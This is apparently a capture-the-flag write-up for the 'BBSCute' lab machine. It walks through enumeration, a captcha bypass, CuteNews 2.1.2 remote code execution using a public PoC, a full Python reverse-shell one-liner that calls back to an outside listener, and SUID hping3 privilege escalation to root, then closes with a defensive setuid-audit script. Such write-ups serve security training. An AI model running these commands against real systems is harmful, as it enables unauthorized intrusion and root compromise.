# BBSCute

## Nmap

```
sudo nmap 192.168.120.128 -p- -sS -sV

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
88/tcp  open  http     nginx 1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Navigating to port 80 in the browser lands us on the default install page for Apache.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d2669941e4c01a44fa38c5cc6bdd6dabfca2072e%2Fimage.png?alt=media)

Running `dirsearch.py` against the target web server reveals `index.php`.

```
python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1cd3c83f2cc81366b6e51d3c099be6d70ddcfe52%2Fimage.png?alt=media)

Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3b3192e8e44a017778bc342301a82983918a0d05%2Fimage.png?alt=media)

Instead, we can register a new user to gain access. On the registration page the captcha image does not load, which stops us from proceeding:

![/index.php?register](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-58193b9582601e396a7243ac7ed914e3ef37bf94%2Fimage.png?alt=media)

Reviewing the source of this page shows that there is a link to `captcha.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c5a088c7dfd78c99deaf5b62846f7f278e22a32%2Fimage.png?alt=media)

Opening `captcha.php` directly shows the value the current captcha should be.

![/captcha.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d0d66578a4f1701e0e48f853892696b73b55a7ec%2Fimage.png?alt=media)

Entering this value into the registration form's captcha field allows us to proceed with creating the new user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-760c317e8208dbe45bfd902c43ea0b00c2565e81%2Fimage.png?alt=media)

The footer of the page shows that the target is running CuteNews 2.1.2. Searching for exploits with `searchsploit` gives the results below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7be9ee406f671f66bc3b3e907e9158bb3d883484%2Fimage.png?alt=media)

Searching further on Google for exploits we come across a PoC on GitHub located here: <https://github.com/CRFSlick/CVE-2019-11447-POC>.

Download the Python script and the `sad.gif` file from the repository into the same directory. Run the script with the syntax shown below (`<script.py>` stands for the script's file name in the repository, which is not given here).

```
python3 <script.py> <User> <Pass> http://192.168.120.128/index.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-953538203bc17090d068a76b77a6a454608c4e63%2Fimage.png?alt=media)

We can now run the following command to get a more usable reverse shell on a different listener:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.120",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-21863045dc6fdb435f73137aa6b52c3632592d1c%2Fimage.png?alt=media)

From here I uploaded `linpeas`, which after executing identified the `hping3` binary as having the SUID bit set, meaning we can execute the binary with root permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c3c0e4a32b6e354ea7096001c64e3531e22d052%2Fimage.png?alt=media)

Then, as per [GTFOBins](https://gtfobins.github.io/gtfobins/hping3/), we can execute it with the SUID bit to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0bda206f8547d9b16157c5456a3f23ceb8d755fa%2Fimage.png?alt=media)

```
/usr/sbin/hping3
/bin/sh -p

OR

./hping3
/bin/sh -p
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-75792b8cfa5fb1d723b2667cedea2ef04b02d5ad%2Fimage.png?alt=media)
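From the defender's side, the root cause of this privilege escalation is a setuid bit on a binary that has no business carrying one. The following POSIX shell audit is an added example, not part of this write-up or of the box: it lists setuid files under a directory tree and reports any whose name is not on an expected allowlist, so a setuid `hping3` like the one found here would be flagged. The `EXPECTED_SUID` allowlist is an assumption for illustration and should be replaced by the host's own baseline.

```sh
#!/bin/sh
# Added example, not from the original write-up: audit setuid binaries under a
# directory tree and report any that are not on an expected allowlist.
# EXPECTED_SUID is an assumed, illustrative baseline; tune it per host/distro.

EXPECTED_SUID="passwd su sudo mount umount ping newgrp chsh chfn gpasswd"

# audit_suid DIR
# Prints the path of each setuid file under DIR whose basename is not in
# EXPECTED_SUID. Returns 0 if nothing unexpected was found, 1 otherwise.
audit_suid() {
    unexpected=$(find "$1" -xdev -type f -perm -4000 2>/dev/null |
        while read -r f; do
            case " $EXPECTED_SUID " in
                *" $(basename "$f") "*) ;;   # known setuid binary, skip it
                *) echo "$f" ;;              # not on the allowlist, report it
            esac
        done)
    [ -z "$unexpected" ] && return 0
    printf '%s\n' "$unexpected"
    return 1
}

# Stand-alone usage: sh suid_audit.sh /   (a setuid hping3 would be listed)
if [ $# -gt 0 ]; then
    audit_suid "$1"
fi
```

Comparing the output against the package manager's recorded file modes (for example `dpkg --verify` on Debian) tells you whether a flagged bit was set by a package or added by hand.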
